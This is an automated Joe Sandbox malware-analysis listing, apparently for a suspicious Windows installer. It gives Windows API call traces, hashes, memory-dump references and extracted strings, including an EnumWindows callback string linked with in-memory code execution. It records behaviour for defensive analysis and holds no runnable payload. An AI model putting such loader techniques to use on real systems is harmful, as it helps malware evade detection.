                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileStringWrite
                                                                  • String ID:
                                                                  • API String ID: 390214022-0
                                                                  • Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                                  • Instruction ID: 95154b02373db31601182c66ccc42c3a1d246cd64da090b0d32e859a1de181fa
                                                                  • Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                                  • Instruction Fuzzy Hash: 7DE04F31900524BADB5036B15ECDDBE20685FC8318B14063FFA12B61C2D9FC0C43466D
                                                                  APIs
                                                                  • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E5C,00000000,?,?), ref: 00406546
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: Create
                                                                  • String ID:
                                                                  • API String ID: 2289755597-0
                                                                  • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                  • Instruction ID: eb898ae1b777051f051c4ab58df26dcf4e878c8f9f4a5c47b005eb973d4bb03b
                                                                  • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                                  • Instruction Fuzzy Hash: 75E0E6B2010109BEEF095F50EC0AD7F371DE708710F11452EF906D4051E6B5E9309A39
                                                                  APIs
                                                                  • WriteFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,0040F4A1,0040CEF0,0040357E,0040CEF0,0040F4A1,00414EF0,00004000,?,00000000,004033A8,00000004), ref: 00406238
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                  • Instruction ID: 6296e445ee025582091cb162a3efd7a4c9b40fecddc6e186669f82422f4bfe72
                                                                  • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                  • Instruction Fuzzy Hash: 00E08C3221021AABDF10AE548C00EEB3B6CEB013A0F02447AFD16E3050D231E83097A9
                                                                  APIs
                                                                  • ReadFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035FA,00008001,00008001,004034FE,00414EF0,00004000,?,00000000,004033A8), ref: 00406209
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                  • Instruction ID: f029eba0d3a9f8ebddca737992f63761e7b4746d0aa70cfc26448402395c61e3
                                                                  • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                  • Instruction Fuzzy Hash: 5DE08632154119EBCF106E908C00EEB379CEF15350F014876F921E7440D230E8328FA4
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(7347505C,00000004,00000040,7347504C), ref: 73472A9D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3422662391.0000000073471000.00000020.00000001.01000000.00000005.sdmp, Offset: 73470000, based on PE: true
                                                                  • Associated: 00000000.00000002.3422423806.0000000073470000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3422678680.0000000073474000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3422693153.0000000073476000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_73470000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: d1f99a19aaa2913472e988d89cfd0011bc755184f41912cacac2d584780cf521
                                                                  • Instruction ID: e3a5f00a3b2e647522ed3cab35799053b6b4245586facda4ea003a24a9e263e6
                                                                  • Opcode Fuzzy Hash: d1f99a19aaa2913472e988d89cfd0011bc755184f41912cacac2d584780cf521
                                                                  • Instruction Fuzzy Hash: 90F0AEF2A002C0DED358EF2A8444B093BE0F74A304B3445AAE19CFE282E3344048CFA5
                                                                  APIs
                                                                  • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileString
                                                                  • String ID:
                                                                  • API String ID: 1096422788-0
                                                                  • Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                                  • Instruction ID: 816608b18dc0c520cd9a71caba4f9b5dbdb35d60be0fcf423de44464aa3a4457
                                                                  • Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                                  • Instruction Fuzzy Hash: 95E04F31800229BEDB00EFA0CD09DAD3678AF40304F00093EF510BB0D1E7FC49519749
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(00000000,00421F28,00000000,00000000,?,?,00000000,?,0040657D,?,00421F28,?,?,Call,?,00000000), ref: 00406513
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID:
                                                                  • API String ID: 71445658-0
                                                                  • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                  • Instruction ID: 600eba3f25fec8fd2e0e76c9bf818d2d921b30b98e1649e5cb913c6f6c6f8cb9
                                                                  • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                  • Instruction Fuzzy Hash: 4DD0123600020DBBDF115E90ED01FAB3B5DAB08714F014826FE06A4091D775D530AB59
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID:
                                                                  • API String ID: 973152223-0
                                                                  • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                  • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                  • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                  • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                  APIs
                                                                    • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                                    • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                                    • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                                    • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                                    • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                                    • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                                    • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                                    • Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                                    • Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                                                    • Part of subcall function 00406B21: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B32
                                                                    • Part of subcall function 00406B21: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B54
                                                                    • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                  • String ID:
                                                                  • API String ID: 2972824698-0
                                                                  • Opcode ID: 6849614f2a8bfbdd5acfcc5c7dc02bd50f0657ec5184be028ed3315e3fd21a51
                                                                  • Instruction ID: ba3ed7a1875ec382e1b93905bcfefb33a8222a1057eccf936486356e32fab672
                                                                  • Opcode Fuzzy Hash: 6849614f2a8bfbdd5acfcc5c7dc02bd50f0657ec5184be028ed3315e3fd21a51
                                                                  • Instruction Fuzzy Hash: 48F06D32905125EBDB20BBE599C59DE76F59B00318F25413FE102B21E1CB7C4E459A6E
                                                                  APIs
                                                                  • GlobalAlloc.KERNELBASE(00000040,?,734712DB,?,7347137F,00000019,734711CA,-000000A0), ref: 734712C5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3422662391.0000000073471000.00000020.00000001.01000000.00000005.sdmp, Offset: 73470000, based on PE: true
                                                                  • Associated: 00000000.00000002.3422423806.0000000073470000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3422678680.0000000073474000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3422693153.0000000073476000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_73470000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: AllocGlobal
                                                                  • String ID:
                                                                  • API String ID: 3761449716-0
                                                                  • Opcode ID: 68983a30cdf02bfe00ae2c72683dc38d3cb16f27c5c45badca8513c83343505f
                                                                  • Instruction ID: 0c94d5095c9e519da184bfbbb4d5dc33e7f3101162753b0dfde240c64cfdd786
                                                                  • Opcode Fuzzy Hash: 68983a30cdf02bfe00ae2c72683dc38d3cb16f27c5c45badca8513c83343505f
                                                                  • Instruction Fuzzy Hash: 72B002B2640150DFEE44AB55DD4AF3536D4F740705F644450B609F5151D56458148565
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000403), ref: 004058A4
                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004058B3
                                                                  • GetClientRect.USER32(?,?), ref: 004058F0
                                                                  • GetSystemMetrics.USER32(00000002), ref: 004058F7
                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405918
                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405929
                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040593C
                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040594A
                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040595D
                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040597F
                                                                  • ShowWindow.USER32(?,00000008), ref: 00405993
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004059B4
                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059C4
                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059DD
                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059E9
                                                                  • GetDlgItem.USER32(?,000003F8), ref: 004058C2
                                                                    • Part of subcall function 00404636: SendMessageW.USER32(00000028,?,?,00404461), ref: 00404644
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405A06
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000057DA,00000000), ref: 00405A14
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405A1B
                                                                  • ShowWindow.USER32(00000000), ref: 00405A3F
                                                                  • ShowWindow.USER32(?,00000008), ref: 00405A44
                                                                  • ShowWindow.USER32(00000008), ref: 00405A8E
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AC2
                                                                  • CreatePopupMenu.USER32 ref: 00405AD3
                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AE7
                                                                  • GetWindowRect.USER32(?,?), ref: 00405B07
                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B20
                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B58
                                                                  • OpenClipboard.USER32(00000000), ref: 00405B68
                                                                  • EmptyClipboard.USER32 ref: 00405B6E
                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B7A
                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405B84
                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B98
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405BB8
                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405BC3
                                                                  • CloseClipboard.USER32 ref: 00405BC9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                  • String ID: H/B${
                                                                  • API String ID: 590372296-332483393
                                                                  • Opcode ID: d18a2026774e62a2c92573f4287a0ca8136519a3f9d5dde66db426fe6a39353e
                                                                  • Instruction ID: 1bfd88ad0a039f30930ce625e3f17186fc56f4394c79b8c388f8475f2b475093
                                                                  • Opcode Fuzzy Hash: d18a2026774e62a2c92573f4287a0ca8136519a3f9d5dde66db426fe6a39353e
                                                                  • Instruction Fuzzy Hash: A7B127B1900608FFDB21AF60DD85DAE7B79FB44354F00413AFA41A61A0CB795E52DF68
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404B41
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404B6B
                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404C1C
                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404C27
                                                                  • lstrcmpiW.KERNEL32(Call,00422F48,00000000,?,?), ref: 00404C59
                                                                  • lstrcatW.KERNEL32(?,Call), ref: 00404C65
                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C77
                                                                    • Part of subcall function 00405CC6: GetDlgItemTextW.USER32(?,?,00000400,00404CAE), ref: 00405CD9
                                                                    • Part of subcall function 00406930: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\x6yDsHJ9tr.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
                                                                    • Part of subcall function 00406930: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
                                                                    • Part of subcall function 00406930: CharNextW.USER32(?,"C:\Users\user\Desktop\x6yDsHJ9tr.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
                                                                    • Part of subcall function 00406930: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA
                                                                  • GetDiskFreeSpaceW.KERNEL32(00420F18,?,?,0000040F,?,00420F18,00420F18,?,?,00420F18,?,?,000003FB,?), ref: 00404D3A
                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D55
                                                                    • Part of subcall function 00404EAE: lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
                                                                    • Part of subcall function 00404EAE: wsprintfW.USER32 ref: 00404F58
                                                                    • Part of subcall function 00404EAE: SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.3371984866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.3371971746.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372013956.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372027663.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.3372177076.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_x6yDsHJ9tr.jbxd
                                                                  Similarity
                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: A$C:\Users\user\eftermodnendes\ringeagt$Call$H/B$user32::EnumWindows(i r1 ,i 0)
                                                                  • API String ID: 2624150263-2177096811
                                                                  • Opcode ID: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
                                                                  • Instruction ID: 96009b05525636a0bc85a96efb184481c484ec56fefee2337862baa2afa4bf02
                                                                  • Opcode Fuzzy Hash: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
                                                                  • Instruction Fuzzy Hash: DDA173B1900209ABDB11AFA5CD45AEFB7B8EF84314F11843BF601B62D1D77C99418B6D
                                                                  APIs
                                                                    • Part of subcall function 734712BB: GlobalAlloc.KERNELBASE(00000040,?,734712DB,?,7347137F,00000019,734711CA,-000000A0), ref: 734712C5
                                                                  • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 73471D2D
                                                                  • lstrcpyW.KERNEL32(00000008,?), ref: 73471D75
                                                                  • lstrcpyW.KERNEL32(00000808,?), ref: 73471D7F
                                                                  • GlobalFree.KERNEL32(00000000), ref: 73471D92
                                                                  • GlobalFree.KERNEL32(?), ref: 73471E74
                                                                  • GlobalFree.KERNEL32(?), ref: 73471E79
                                                                  • GlobalFree.KERNEL32(?), ref: 73471E7E
                                                                  • GlobalFree.KERNEL32(00000000), ref: 73472068
                                                                  • lstrcpyW.KERNEL32(?,?), ref: 73472222
                                                                  • GetModuleHandleW.KERNEL32(00000008), ref: 734722A1
                                                                  • LoadLibraryW.KERNEL32(00000008), ref: 734722B2
                                                                  • GetProcAddress.KERNEL32(?,?), ref: 7347230C
                                                                  • lstrlenW.KERNEL32(00000808), ref: 73472326
                                                                  Memory Dump Source
